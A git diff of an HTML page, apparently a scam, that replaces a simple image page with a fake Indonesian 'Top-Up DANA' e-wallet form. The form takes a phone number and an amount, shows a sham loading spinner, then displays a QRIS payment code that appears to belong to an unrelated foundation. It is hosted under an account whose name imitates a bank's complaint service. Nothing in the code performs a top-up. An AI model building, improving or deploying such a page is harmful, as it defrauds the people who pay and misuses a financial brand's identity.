--- a/index.html
+++ b/index.html
@@ -1,39 +1,200 @@
 <!DOCTYPE html>
-<html lang="en">
+<html lang="id">
 <head>
-  <meta charset="UTF-8">
-  <meta name="theme-color" content="#15317e">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Center Image Example</title>
-  <style>
-    body, html {
-      height: 100%;
-      margin: 0;
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      background-color: #f0f0f0; /* Warna latar belakang halaman */
-    }
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Top-Up DANA</title>
+    <style>
+        body {
+            font-family: Arial, sans-serif;
+            background-color: #f0f0f0;
+            margin: 0;
+            padding: 20px;
+            display: flex;
+            align-items: center;
+            justify-content: center;
+            height: 100vh;
+            overflow: hidden;
+        }
 
-    .container {
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      height: 100%;
-      width: 100%;
-    }
+        .container {
+            max-width: 400px;
+            background-color: #fff;
+            border-radius: 10px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            padding: 20px;
+            position: relative;
+        }
 
-    img {
-      max-width: 100%;
-      max-height: 100%;
-      height: auto;
-      width: auto;
-    }
-  </style>
+        .header {
+            display: flex;
+            align-items: center;
+            margin-bottom: 20px;
+        }
+
+        .header img {
+            width: 40px;
+            height: 40px;
+            margin-right: 10px;
+        }
+
+        .header input[type="tel"] {
+            flex: 1;
+            font-size: 16px;
+            padding: 10px;
+            border: none;
+            border-bottom: 2px solid #d3d3d3;
+            outline: none;
+        }
+
+        .header input[type="text"]:focus {
+            border-bottom: 2px solid #273746; /* Biru Kehitaman */
+        }
+
+        .options {
+            display: grid;
+            grid-template-columns: 1fr 1fr;
+            gap: 10px;
+            margin-bottom: 20px;
+        }
+
+        .option {
+            background-color: #f9f9f9;
+            border-radius: 5px;
+            text-align: center;
+            padding: 15px;
+            font-size: 16px;
+            cursor: pointer;
+            transition: background-color 0.3s;
+        }
+
+        .option:hover {
+            background-color: #e0e0e0;
+        }
+
+        .option span {
+            display: block;
+            margin-top: 5px;
+            color: #ff9800;
+            font-weight: bold;
+        }
+
+        .submit-button {
+            display: flex;
+            justify-content: flex-end;
+        }
+
+        .submit-button button {
+            padding: 10px 20px;
+            background-color: #273746; /* Biru Kehitaman */
+            color: white;
+            border: none;
+            border-radius: 5px;
+            font-size: 16px;
+            cursor: pointer;
+            transition: background-color 0.3s;
+        }
+
+        .submit-button button:hover {
+            background-color: #1c2833; /* Biru lebih gelap */
+        }
+
+        .loader {
+            border: 4px solid #f3f3f3;
+            border-top: 4px solid #273746; /* Biru Kehitaman */
+            border-radius: 50%;
+            width: 30px;
+            height: 30px;
+            animation: spin 2s linear infinite;
+            display: none;
+            position: fixed;
+            top: 50%;
+            left: 44%;
+            transform: translate(-50%, -50%);
+            z-index: 1000;
+        }
+
+        .qris-box {
+            display: none;
+            text-align: center;
+            padding: 20px;
+            border: 2px solid #273746; /* Biru Kehitaman */
+            border-radius: 10px;
+            background-color: #fff;
+            position: fixed;
+            top: 50%;
+            left: 50%;
+            transform: translate(-50%, -50%);
+            z-index: 1000;
+            width: 80%;
+            max-width: 300px;
+        }
+
+        .qris-box img {
+            max-width: 100%;
+            height: auto;
+        }
+
+        @keyframes spin {
+            0% { transform: rotate(0deg); }
+            100% { transform: rotate(360deg); }
+        }
+
+    </style>
 </head>
 <body>
-  <div class="container">
-    <img src="Poto.png" alt="Centered Image">
-  </div>
+
+<div class="container">
+    <div class="header">
+        <img src="https://raw.githubusercontent.com/Peng4duanBrimo/Peng4duanBrimo.github.io/main/CC_20240407_152118.png" alt="DANA Logo">
+        <input type="tel" id="phoneNumber" placeholder="Masukan Nomor HP">
+    </div>
+    <div class="options">
+        <div class="option" onclick="selectOption(this)">DANA 1000<span>Rp 1.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 2000<span>Rp 2.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 3000<span>Rp 3.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 4000<span>Rp 4.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 5000<span>Rp 5.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 10.000<span>Rp 10.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 20.000<span>Rp 20.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 25.000<span>Rp 25.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 50.000<span>Rp 50.000</span></div>
+        <div class="option" onclick="selectOption(this)">DANA 75.000<span>Rp 75.000</span></div>
+    </div>
+    <div class="submit-button">
+        <button onclick="submitForm()">Lanjut</button>
+    </div>
+    <div class="loader" id="loader"></div>
+    <div class="qris-box" id="qrisBox">
+        <h3>Silakan Scan QRIS untuk pembayaran</h3>
+        <img src="https://raw.githubusercontent.com/Peng4duanBrimo/Peng4duanBrimo.github.io/main/qris-yayasan-bakti-kamajaya-pf.jpg" alt="QRIS">
+    </div>
+</div>
+
+<script>
+    let selectedOption = null;
+
+    function selectOption(element) {
+        if (selectedOption) {
+            selectedOption.style.backgroundColor = '#f9f9f9';
+        }
+        selectedOption = element;
+        element.style.backgroundColor = '#dcdcdc';
+    }
+
+    function submitForm() {
+        const phoneNumber = document.getElementById('phoneNumber').value;
+        if (phoneNumber && selectedOption) {
+            document.getElementById('loader').style.display = 'block';
+            setTimeout(() => {
+                document.getElementById('loader').style.display = 'none';
+                document.getElementById('qrisBox').style.display = 'block';
+            }, 3000);
+        } else {
+            alert('Harap masukkan nomor HP dan pilih nominal!');
+        }
+    }
+</script>
+
 </body>
 </html>
